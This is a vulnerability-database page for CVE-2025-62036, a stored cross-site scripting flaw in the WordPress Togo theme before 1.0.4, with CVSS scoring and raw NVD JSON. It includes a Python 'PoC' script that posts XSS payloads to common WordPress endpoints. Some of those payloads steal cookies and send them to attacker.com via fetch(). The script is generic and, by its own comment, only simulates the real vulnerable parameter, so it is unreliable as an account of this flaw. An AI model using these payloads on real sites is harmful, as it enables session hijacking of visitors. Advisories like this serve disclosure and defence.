Security Vulnerability Report
中文
CVE-2025-62036 CVSS 7.1 HIGH

CVE-2025-62036

Published: 2025-11-06 16:16:10
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Togo主题 < 1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import argparse def exploit_togo_xss(target_url, payload): """ CVE-2025-62036 PoC - Togo Theme XSS Exploitation Target: WordPress Togo Theme < 1.0.4 Vulnerability: Stored XSS in user input fields """ # Common WordPress/Togo vulnerable endpoints endpoints = [ '/wp-json/wp/v2/users', '/wp-admin/admin-ajax.php', '/wp-comments-post.php' ] # XSS payload examples xss_payloads = [ '<script>alert(document.cookie)</script>', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>', '<svg onload=fetch("https://attacker.com/log?d="+btoa(document.domain))>' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } print(f'[*] Target: {target_url}') print(f'[*] Using payload: {payload}') print('[*] Sending malicious request...') # Simulate exploitation (actual implementation depends on vulnerable parameter) for endpoint in endpoints: try: full_url = target_url.rstrip('/') + endpoint data = { 'comment': payload, 'author': 'XSS Tester', 'email': '[email protected]' } response = requests.post(full_url, data=data, headers=headers, timeout=10) print(f'[+] Request sent to {endpoint} - Status: {response.status_code}') except requests.RequestException as e: print(f'[-] Error targeting {endpoint}: {str(e)}') print('\n[!] XSS payload has been injected.') print('[!] Any user visiting affected pages will trigger the payload.') if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-62036 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-p', '--payload', default='<script>alert(document.domain)</script>', help='XSS Payload') args = parser.parse_args() exploit_togo_xss(args.url, args.payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62036", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:09.920", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/togo/vulnerability/wordpress-togo-theme-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}